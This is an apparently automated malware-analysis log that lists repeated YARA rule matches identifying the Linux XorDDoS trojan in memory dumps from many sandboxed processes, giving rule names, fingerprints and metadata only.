            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
